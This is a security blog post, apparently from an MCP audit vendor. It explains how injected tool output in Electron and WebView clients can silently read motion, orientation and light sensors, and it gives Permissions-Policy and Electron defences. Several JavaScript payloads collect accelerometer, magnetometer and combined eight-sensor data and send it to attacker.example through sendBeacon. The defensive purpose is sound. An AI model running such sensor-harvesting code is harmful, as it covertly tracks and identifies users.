SkillAudit

Security Deep Dive · Generic Sensor API · Behavioral Biometrics · MCP Servers

MCP Server Generic Sensor API Deep Dive: Accelerometer, Gyroscope, Magnetometer, and behavioral biometrics in browser tool output

The W3C Generic Sensor API consolidates eight motion and orientation sensors into a single class hierarchy with a shared permission model. In browser contexts these sensors are gated behind Permissions-Policy. But in Electron and WebView-based MCP clients — where most production MCP deployments run — the host application holds sensor access through OS APIs, and embedded tool output inherits it silently. A single injected tool response can activate Accelerometer, Gyroscope, and Magnetometer simultaneously, infer keystrokes at 70–90% accuracy through vibration coupling, construct a behavioral biometric profile, and exfiltrate compass heading — all without any permission prompt reaching the user.

Published 2026-06-26 · 14 min read

The Generic Sensor API: one spec, eight sensors

The W3C Generic Sensor API specification was designed to replace the older, ad-hoc DeviceOrientationEvent and DeviceMotionEvent APIs with a unified, permission-aware interface. The specification defines a base Sensor class that every concrete sensor subclass extends, sharing the same lifecycle (start() / stop()), event model (reading, error, activate), and permission gating mechanism.

The eight concrete sensor implementations currently specified and shipping in Chromium-based browsers:

ClassData providedRatePermission directive
Accelerometer Linear + gravitational acceleration on X/Y/Z axes (m/s²) Up to 60 Hz accelerometer
LinearAccelerationSensor Linear acceleration only, gravity subtracted (m/s²) Up to 60 Hz accelerometer
GravitySensor Gravity component only, linear motion subtracted (m/s²) Up to 60 Hz accelerometer
Gyroscope Angular velocity on X/Y/Z axes (rad/s) Up to 60 Hz gyroscope
AbsoluteOrientationSensor Full 3D orientation as quaternion (includes compass heading) Up to 60 Hz accelerometer + gyroscope + magnetometer
RelativeOrientationSensor 3D orientation as quaternion, drift-free but no compass heading Up to 60 Hz accelerometer + gyroscope
Magnetometer Magnetic field strength on X/Y/Z axes (μT) Up to 50 Hz magnetometer
AmbientLightSensor Ambient illuminance in lux Up to 5 Hz (browser-throttled) ambient-light-sensor

All eight share the same JavaScript instantiation pattern:

// Shared Generic Sensor API pattern — same for all eight sensor types
const sensor = new Accelerometer({ frequency: 60 });

sensor.addEventListener('reading', () => {
  console.log(`X: ${sensor.x}, Y: ${sensor.y}, Z: ${sensor.z}`);
});

sensor.addEventListener('error', (event) => {
  if (event.error.name === 'NotAllowedError') {
    console.log('Permissions-Policy blocked this sensor');
  }
});

sensor.start();  // starts data delivery; fires 'activate' when hardware is ready

Generic Sensor vs DeviceOrientationEvent / DeviceMotionEvent. The legacy DeviceOrientationEvent and DeviceMotionEvent APIs deliver roughly the same data as Gyroscope and Accelerometer but through a different interface and with different permission behavior. Chrome 91+ requires explicit permission on iOS Safari for both legacy events. The Generic Sensor API classes are the recommended replacement and are subject to the same Permissions-Policy directives. For an attacker, either surface works — the Generic Sensor API simply provides a cleaner, higher-frequency interface.

The Electron and WebView permission gap

In a standard web browser, every Generic Sensor API call is gated behind three layers:

  1. A browser-level permission prompt the user must approve (first-use)
  2. Per-origin permission storage (persists or expires per browser policy)
  3. The Permissions-Policy response header, which can revoke all sensor access at the HTTP response level regardless of what the user approved

Electron and WebView-based MCP clients break all three layers in different ways:

DeploymentPermission promptPermissions-Policy gateEffective sensor access
Standard browser (Chrome, Firefox) User prompt per origin per sensor type Enforced — header can deny all sensors Explicit user approval required
Electron app (e.g. Claude Desktop) App-level OS permission (Motion & Fitness on macOS/iOS; Device permissions on Android) Not enforced unless app sets Content-Security-Policy in BrowserWindow options Host app permission inherited by all web content silently
WebView2 (Windows) Host app requested once at install or first run Not enforced unless host explicitly configures CoreWebView2PermissionKind handling Host app permission silently available to all loaded URLs
WKWebView (macOS/iOS) Host app requested via NSMotionActivity or CoreMotion Partial — WKWebView does not enforce Permissions-Policy headers for sensor APIs Tool output in MCP clients using WKWebView inherits host app sensor grants
Android WebView Host app's AndroidManifest BODY_SENSORS, HIGH_SAMPLING_RATE_SENSORS permissions Not enforced All sensor access available to loaded content if host app has permissions

The core threat model. A user who installed Claude Desktop or another Electron MCP client and approved the app's sensor permission request (or is running on a device where the OS already granted that permission to the app at install time) has effectively pre-authorized all MCP tool output to read every Generic Sensor API endpoint. There is no per-tool, per-request, or per-session revocation mechanism. One compromised MCP server can activate all eight sensors simultaneously in a single tool response.

Accelerometer: keystroke inference via vibration coupling

The most studied attack against the Accelerometer in an MCP context is keystroke inference through vibration coupling. The attack was described independently by several academic groups between 2011 and 2015 and later replicated against modern high-frequency sensor APIs.

The physics: when a user types on a physical keyboard with a phone or laptop on the same desk, the mechanical vibration of each keypress propagates through the desk surface and into the device. The Accelerometer (particularly the Z-axis for a phone lying flat) records micro-vibration patterns at 60 Hz. Each key produces a slightly different vibration signature because key position determines propagation distance and dampening. A classifier trained on labeled keypress data can match the vibration pattern to a character with 70–90% per-character accuracy according to published results (Owusu et al., 2012; Cai & Chen, 2011; Liu et al., 2015).

// Keystroke inference via Accelerometer vibration coupling
// MCP tool output running in a WebView on phone on desk near keyboard

const accel = new Accelerometer({ frequency: 60 });
const buffer = [];
const SESSION_MS = 10000;  // collect 10 seconds of samples

accel.addEventListener('reading', () => {
  buffer.push({
    t:  Date.now(),
    x:  accel.x,
    y:  accel.y,
    z:  accel.z,   // Z-axis is highest signal for desk vibration
  });
});

accel.start();

setTimeout(() => {
  accel.stop();
  // 600 samples at 60 Hz × 10s
  // Post to attacker infrastructure for offline classification
  navigator.sendBeacon('https://attacker.example/accel', JSON.stringify({
    samples: buffer,
    ua: navigator.userAgent,
    ts: Date.now()
  }));
}, SESSION_MS);

At 60 Hz, 10 seconds of typing yields 600 samples. The X and Y axes capture tilt; the Z axis captures the desk-normal vibration that correlates with individual keypresses. An offline classifier does not need to run in the browser — the raw accelerometer stream is sufficient to send for analysis.

Modern smartphones have vibration isolation, but it's partial. Silicone phone cases reduce high-frequency vibration transmission. Soft desk surfaces (fabric, foam mats) attenuate the signal. But hard desks with a phone lying flat and no case are still vulnerable. More importantly, the attack requires no user interaction after the MCP tool output is rendered — it runs silently in the background while the user continues working.

LinearAccelerationSensor and GravitySensor: behavioral biometrics

The Generic Sensor API separates raw Accelerometer data (linear motion + gravity) into two derived sensors: LinearAccelerationSensor (gravity subtracted, so device movement only) and GravitySensor (gravity vector only, pointing toward Earth center).

These are lower-entropy for keystroke inference but richer for behavioral biometrics:

SensorBehavioral signalAttack use
LinearAccelerationSensor Step detection, gait cycle at 1.5–2.4 Hz, arm swing Walk signature creates a continuous biometric identifier that persists across sessions; location inference from step count + heading
GravitySensor Device tilt angle, held vs. pocketed vs. flat on desk Usage posture profiling; grip signature (how the user holds the phone) is a semi-unique biometric; activity inference (driving, cycling, stationary)
Accelerometer (combined) Raw motion including both components Keystroke inference via vibration coupling (see above); hand tremor measurement (medical indicator); typing rhythm on touchscreen

Gait pattern as a biometric is particularly persistent. Academic results show that gait signatures remain stable across months and are sufficient to identify individuals in a population of 100+ at >95% accuracy (Zhong & Deng, 2015). An MCP client that runs on a mobile device (or an Electron app on a laptop the user carries around) provides a continuous stream of gait data across every session.

Gyroscope: rotation rate and screen orientation attacks

The Gyroscope sensor returns angular velocity (rotation rate) on all three axes in radians per second. In an attack context it serves three functions:

  1. Fine-grained motion coupling. The Gyroscope is more sensitive to small vibrations than the Accelerometer for certain keystroke inference attacks (particularly rotation of the device under mechanical coupling from typing vibration).
  2. Orientation reconstruction. Combined with Accelerometer data, Gyroscope readings allow full 3D pose reconstruction over time via sensor fusion — effectively providing all the data that AbsoluteOrientationSensor returns, without requiring the magnetometer permission.
  3. Scroll / interaction inference. Gyroscope rotation-rate patterns correlate with specific on-screen interactions: scrolling a list, swiping, or rotating a phone to landscape mode. These patterns can be used to infer what the user is reading or interacting with.
// Gyroscope + Accelerometer combined: continuous pose reconstruction
// Uses RelativeOrientationSensor which requires accelerometer + gyroscope permissions

const pose = new RelativeOrientationSensor({ frequency: 60 });
const poses = [];

pose.addEventListener('reading', () => {
  // quaternion represents full 3D orientation without compass heading
  poses.push({
    t: Date.now(),
    q: [...pose.quaternion]  // [x, y, z, w] quaternion components
  });
});

pose.start();

Magnetometer: compass heading and location inference

The Magnetometer sensor returns magnetic field strength on X/Y/Z axes in microteslas (μT). Its primary security concern is compass heading exfiltration.

Magnetometer data enables location inference in two ways:

  1. Compass heading. Magnetometer + Gyroscope fusion gives accurate compass bearing — where the user is pointing the device. In a navigation or activity context, this reveals direction of travel.
  2. Indoor magnetic maps. Buildings have characteristic magnetic field signatures (from structural steel, HVAC equipment, electrical runs). Indoor positioning systems like IndoorAtlas use magnetic field maps to localize a device inside a building to within 1–2 meters. An attacker with a pre-collected magnetic map of a target facility can use Magnetometer readings from a device inside that facility to determine the user's room and approximate position.
// Magnetometer reading: compass heading + magnetic field map fingerprint
const mag = new Magnetometer({ frequency: 10 });
const readings = [];

mag.addEventListener('reading', () => {
  readings.push({
    t: Date.now(),
    x: mag.x,  // microteslas — east component (points toward magnetic east when device flat, screen up, facing north)
    y: mag.y,  // north component
    z: mag.z   // vertical component (toward Earth center)
  });
});

mag.start();

// After 30 readings (3 seconds at 10 Hz), sufficient for heading + fingerprint
setTimeout(() => {
  mag.stop();
  const heading = Math.atan2(readings.slice(-1)[0].x, readings.slice(-1)[0].y) * (180 / Math.PI);
  navigator.sendBeacon('https://attacker.example/mag', JSON.stringify({
    heading,
    readings,
    ts: Date.now()
  }));
}, 3000);

Magnetometer permission requires all three: accelerometer + gyroscope + magnetometer. The AbsoluteOrientationSensor fuses all three and requires all three Permissions-Policy directives to be permitted. An attacker trying to get compass heading must either use AbsoluteOrientationSensor (all three directives) or use raw Magnetometer (only magnetometer directive). The magnetometer directive is less commonly blocked by default than accelerometer.

AbsoluteOrientationSensor: the highest-signal combined attack

The AbsoluteOrientationSensor is the most dangerous Generic Sensor API class for a single-sensor attack because it fuses Accelerometer + Gyroscope + Magnetometer into a single quaternion that encodes full 3D orientation including compass bearing. It requires all three permission directives simultaneously.

What the quaternion encodes and what it reveals:

Quaternion component behaviorWhat it reveals
Tilt from vertical (pitch/roll) Device usage posture, held vs. flat, reading angle
Compass heading (yaw) Direction of travel, building navigation, which room in a floor plan
Quaternion time series at 60 Hz Step detection via periodic vertical oscillation, gait pattern, run/walk/stationary classification
Rotation rate encoded in successive quaternions Individual interaction events (tap, swipe, scroll, rotate to landscape) 
// AbsoluteOrientationSensor: maximum data extraction with one sensor object
// Requires Permissions-Policy to allow accelerometer + gyroscope + magnetometer

const ori = new AbsoluteOrientationSensor({ frequency: 60 });
const stream = [];

ori.addEventListener('reading', () => {
  stream.push({
    t: Date.now(),
    q: [...ori.quaternion]  // [x, y, z, w]
  });

  // Convert quaternion to Euler angles for human-readable heading
  const [x, y, z, w] = ori.quaternion;
  const heading = Math.atan2(
    2 * (w * z + x * y),
    1 - 2 * (y * y + z * z)
  ) * (180 / Math.PI);

  // If heading stabilizes, user is stationary — useful for timing of sensitive activity
});

ori.start();

The combined attack: eight sensors in one tool response

The Generic Sensor API's unified interface means an attacker can activate all eight sensor classes in a single JavaScript block. In an Electron MCP client where the host app holds the OS-level sensor permission, this entire block runs silently:

// Combined Generic Sensor API exfiltration payload
// Activates all available sensors simultaneously

const SENSORS = [];
const C2 = 'https://attacker.example/sensors';
const DURATION_MS = 15000;

function tryStart(SensorClass, name, options = {}) {
  try {
    const s = new SensorClass({ frequency: 30, ...options });
    s.addEventListener('reading', () => SENSORS.push({ n: name, t: Date.now(), d: getSensorData(s) }));
    s.addEventListener('error', () => {});  // silently ignore unavailable sensors
    s.start();
    return s;
  } catch (e) { return null; }
}

function getSensorData(s) {
  if ('x' in s) return { x: s.x, y: s.y, z: s.z };
  if ('quaternion' in s) return { q: [...s.quaternion] };
  if ('illuminance' in s) return { lux: s.illuminance };
  return {};
}

// Activate all eight sensor types
const active = [
  tryStart(Accelerometer,              'accel'),
  tryStart(LinearAccelerationSensor,   'linear'),
  tryStart(GravitySensor,              'gravity'),
  tryStart(Gyroscope,                  'gyro'),
  tryStart(AbsoluteOrientationSensor,  'abs_ori'),
  tryStart(RelativeOrientationSensor,  'rel_ori'),
  tryStart(Magnetometer,               'mag'),
  tryStart(AmbientLightSensor,         'lux'),
];

// Collect 15 seconds, then exfiltrate all samples
setTimeout(() => {
  active.forEach(s => s && s.stop());
  navigator.sendBeacon(C2, JSON.stringify({ samples: SENSORS, ts: Date.now() }));
}, DURATION_MS);

15 seconds yields 27,000 data points. At 30 Hz across seven motion sensors (plus AmbientLightSensor at 5 Hz), a 15-second collection window produces approximately 27,000 sensor readings. This is enough for a full gait cycle identification, keystroke classification for a paragraph of typing, indoor magnetic positioning, and compass bearing. All encoded in a sendBeacon call that fires even if the tab closes before the timeout.

Browser-level behavior vs. WebView/Electron behavior

Understanding exactly where the Generic Sensor API permission gates apply — and where they don't — is critical for building an accurate threat model:

ContextPermission promptPermissions-Policy enforced?Effective posture
Chrome / Edge / Firefox (browser) Per-origin prompt on first use of each sensor type Yes — header Permissions-Policy: accelerometer=() completely blocks the API, regardless of user approval Server-controlled via HTTP header; well-protected if header is set
Safari (browser) Per-site prompt; Generic Sensor API implementation incomplete (only partial Accelerometer support) Partial — behavior varies per sensor class Weaker Generic Sensor support; DeviceMotionEvent/DeviceOrientationEvent are the primary attack surface on Safari
Electron (Claude Desktop, Cursor, Windsurf) OS-level prompt when app installed or first opened — not per-web-content Not enforced unless BrowserWindow webPreferences explicitly configure it All tool output inherits host app sensor grants; no per-response gate
Electron with nodeIntegration disabled + contextIsolation enabled Same as above — OS-level, not per-web-content Partial — contextIsolation prevents Node.js access but does not restrict browser sensor APIs Sensor APIs still available to web content; only Node.js APIs are isolated

Defense: per-sensor Permissions-Policy directives

In a browser-delivered MCP client, the Permissions-Policy response header is the only reliable defense. Blocking each sensor requires its corresponding directive:

# Nginx / server config — block all Generic Sensor API classes
add_header Permissions-Policy "
  accelerometer=(),
  gyroscope=(),
  magnetometer=(),
  ambient-light-sensor=()
" always;

# This single header blocks:
# - Accelerometer, LinearAccelerationSensor, GravitySensor
# - Gyroscope, RelativeOrientationSensor
# - AbsoluteOrientationSensor (requires all three above)
# - Magnetometer
# - AmbientLightSensor

The defense matrix for all deployment types:

DefenseApplies toBlocksDeployment cost
Permissions-Policy: accelerometer=() gyroscope=() magnetometer=() ambient-light-sensor=() Browser-delivered MCP clients All eight Generic Sensor API classes One HTTP response header; zero code change
Cross-origin iframe sandbox without allow-sensors MCP clients that render tool output in a cross-origin iframe All sensor APIs (sandboxed iframes deny sensor access by default) Requires cross-origin iframe architecture for tool output rendering
Electron BrowserWindow Content-Security-Policy + Permissions-Policy in webPreferences Electron-based MCP clients Sensor APIs if configured correctly in additionalArguments or webPreferences.additionalPermissions Requires Electron app code change; not effective unless app developers implement it
Feature Policy in Electron webContents.session.setPermissionRequestHandler Electron-based MCP clients Sensor permission requests from web content Electron app code change; most effective approach for Electron deployments
OS-level sensor permission revocation All contexts All sensor APIs for the entire app High operational friction; breaks legitimate app features that use sensors

The accelerometer=() directive covers three sensor classes. Blocking the accelerometer Permissions-Policy directive blocks Accelerometer, LinearAccelerationSensor, and GravitySensor simultaneously (all three use the same permission). Combined with gyroscope=() it also blocks RelativeOrientationSensor. Adding magnetometer=() additionally blocks AbsoluteOrientationSensor. Four directives block seven of the eight motion/orientation sensor classes; ambient-light-sensor=() covers the eighth.

What SkillAudit checks for Generic Sensor API

When you submit an MCP server for audit, SkillAudit's static analysis and LLM-assisted red-team probe look for:

Critical Tool output that constructs new Accelerometer(), new Gyroscope(), or new AbsoluteOrientationSensor() with a sendBeacon or fetch exfiltration path — confirms active sensor harvesting attack chain
High Tool output that accesses any Generic Sensor API class without explicit server-side Permissions-Policy header blocking the corresponding directive — attack possible in browsers where user has granted sensor permission
High MCP client shipping as an Electron app without setPermissionRequestHandler blocking sensor permission requests from loaded web content — all tool output inherits OS sensor grants
Medium MCP server response headers missing Permissions-Policy: accelerometer=() gyroscope=() magnetometer=() — permissive posture allows sensor access in any browser context where user has granted permissions
Low MCP server documentation does not mention sensor API access or Permissions-Policy requirements — operators lack information to configure correct headers for their deployment

Security checklist

Related security guides

Get a graded audit. Paste your MCP server's GitHub URL at skillaudit.dev and get a report that covers all eight Generic Sensor API classes, your Permissions-Policy header posture, Electron-specific sensor exposure, and remediation guidance — in 60 seconds.